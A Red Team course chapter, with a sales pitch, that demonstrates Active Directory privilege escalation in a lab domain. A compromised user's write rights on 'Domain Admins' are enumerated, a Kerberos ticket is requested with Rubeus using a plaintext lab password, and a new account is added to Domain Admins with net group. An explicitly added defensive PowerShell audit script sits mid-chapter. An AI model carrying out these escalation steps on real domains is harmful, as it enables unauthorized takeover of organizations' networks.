GenericAll on a Group

To take your learning to the next level and practise these techniques safely and effectively, we invite you to purchase premium access to our course material. Don't miss this opportunity to deepen your knowledge. For more information and to purchase your access, visit our sales channel: https://wa.link/ej3kiu. We look forward to starting this journey together!

Context

In Red Team operations, analysing the permissions and roles of users in an Active Directory (AD) environment is crucial for identifying potential attack vectors and vulnerabilities. This chapter focuses on a hypothetical scenario in which the user "groupwrite.user" in the "SPARTANCYBERSEC" domain has been compromised. We will use typical PowerShell output to illustrate how this compromise could be exploited to escalate privileges or move laterally.

We start by enumerating the following group:

PS C:\Users\admin\Desktop\ADModule> import-module .\Microsoft.ActiveDirectory.Management.dll

PS C:\Users\admin\Desktop> Get-ADGroup "Domain Admins" -Properties * | select -ExpandProperty ntSecurityDescriptor | Format-List

Path   :
Owner  : SPARTANCYBERSEC\Domain Admins
Group  : SPARTANCYBERSEC\Domain Admins
Access : NT AUTHORITY\Authenticated Users Allow
         NT AUTHORITY\SYSTEM Allow
         BUILTIN\Administrators Allow
         SPARTANCYBERSEC\Domain Admins Allow
         SPARTANCYBERSEC\Enterprise Admins Allow
         SPARTANCYBERSEC\groupwrite.user Allow
         Everyone Allow
         NT AUTHORITY\SELF Allow
         NT AUTHORITY\SELF Allow
         BUILTIN\Pre-Windows 2000 Compatible Access Allow
         BUILTIN\Windows Authorization Access Group Allow
         BUILTIN\Terminal Server License Servers Allow
         BUILTIN\Terminal Server License Servers Allow
         SPARTANCYBERSEC\Cert Publishers Allow
Audit  :
Sddl   : O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-1861162130-2580302541-221646211-519)(A;CI;CCDCLCS-RESUMIDO)

The line SPARTANCYBERSEC\groupwrite.user Allow shows that "groupwrite.user" has permissions assigned on the "Domain Admins" group. In an AD environment, holding rights over this group is significant, since "Domain Admins" have full control of the domain. Note that this Format-List view only lists each ACE's identity and Allow/Deny type, not the specific rights; to confirm whether the ACE is GenericAll or a narrower write on the member attribute, inspect each ACE's ActiveDirectoryRights and ObjectType properties (or the full SDDL).
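The following audit script is an added example for this chapter and is not code from the original course material. It walks the same ntSecurityDescriptor shown above and reports every Allow ACE that grants GenericAll, or WriteProperty on the "member" attribute, to a principal outside an expected baseline; it assumes the ActiveDirectory module is available (the page loads Microsoft.ActiveDirectory.Management.dll), and the baseline list and the function name Get-GroupMemberWriteRisk are illustrative choices of this example.

```powershell
# Added audit example (not part of the original course material).
# Reports ACEs on a group that allow adding members: GenericAll, or
# WriteProperty scoped to the "member" attribute (or to all attributes).
Import-Module ActiveDirectory

# Schema GUID of the "member" attribute (well known, identical in every forest)
$MemberAttributeGuid = [Guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'

# Principals that hold full control over Domain Admins by default (illustrative baseline)
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    "$env:USERDOMAIN\Domain Admins",
    "$env:USERDOMAIN\Enterprise Admins"
)

function Get-GroupMemberWriteRisk {
    param([Parameter(Mandatory)][string]$GroupName)

    $all   = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $write = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty
    $group = Get-ADGroup -Identity $GroupName -Properties ntSecurityDescriptor

    foreach ($ace in $group.ntSecurityDescriptor.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($ExpectedPrincipals -contains $who) { continue }

        # GenericAll implies every right on the object, including writing "member"
        $hasGenericAll = ($ace.ActiveDirectoryRights -band $all) -eq $all
        # WriteProperty matters when scoped to "member" or to all attributes (empty GUID)
        $hasMemberWrite = (($ace.ActiveDirectoryRights -band $write) -eq $write) -and
                          ($ace.ObjectType -eq $MemberAttributeGuid -or $ace.ObjectType -eq [Guid]::Empty)

        if ($hasGenericAll -or $hasMemberWrite) {
            [PSCustomObject]@{
                Group     = $group.Name
                Principal = $who
                Rights    = $ace.ActiveDirectoryRights.ToString()
                Reason    = $(if ($hasGenericAll) { 'GenericAll' } else { 'WriteProperty on member' })
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Usage: against the ACL shown above this reports SPARTANCYBERSEC\groupwrite.user
Get-GroupMemberWriteRisk -GroupName 'Domain Admins' | Format-Table -AutoSize
```

Principals such as Everyone and Authenticated Users appear in the page's Access list but hold only read rights, so they are not reported; run the function against the other protected groups (Enterprise Admins, Administrators, Schema Admins) to cover the usual escalation targets.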

Given the above, we proceed to impersonate the user:

PS C:\Users\admin\Desktop\SHARED>  ./Rubeus.exe asktgt /user:groupwrite.user /password:Password@1 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\groupwrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

[+] Ticket successfully imported!

  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  groupwrite.user (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/14/2023 4:57:54 AM
  EndTime                  :  11/14/2023 2:57:54 PM
  RenewTill                :  11/21/2023 4:57:54 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  XIGRA7/DQHsJaYNuRFu7ag==
  ASREP (key)              :  64FBAE31CC352FC26AF97CBDEF151E03

After that, we will have a cached ticket for the user groupwrite.user:

PS C:\Users\admin\Desktop\SHARED> klist

Current LogonId is 0:0x30685

Cached Tickets: (4)

#0>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/14/2023 4:57:54 (local)
        End Time:   11/14/2023 14:57:54 (local)
        Renew Time: 11/21/2023 4:57:54 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 11/14/2023 4:47:34 (local)
        End Time:   11/14/2023 14:47:28 (local)
        Renew Time: 11/21/2023 4:47:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x2 -> DELEGATION
        Kdc Called: First-DC.spartancybersec.corp

#2>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/14/2023 4:57:54 (local)
        End Time:   11/14/2023 14:47:28 (local)
        Renew Time: 11/21/2023 4:47:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp

#3>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: cifs/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/14/2023 4:47:34 (local)
        End Time:   11/14/2023 14:47:28 (local)
        Renew Time: 11/21/2023 4:47:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp

Next, we validate the members of the affected group:

PS C:\> net group "domain admins" /domain
The request will be processed at a domain controller for domain spartancybersec.corp.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin                    Administrator            sephiroth
The command completed successfully.

And we finish by carrying out our attack with the net command:

PS C:\> net group "domain admins" user.hacked /add /domain
The request will be processed at a domain controller for domain spartancybersec.corp.

The command completed successfully.

After that, we can validate the result with the following command:

PS C:\> net group "domain admins" /domain
The request will be processed at a domain controller for domain spartancybersec.corp.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin                    Administrator            sephiroth
user.hacked
The command completed successfully.
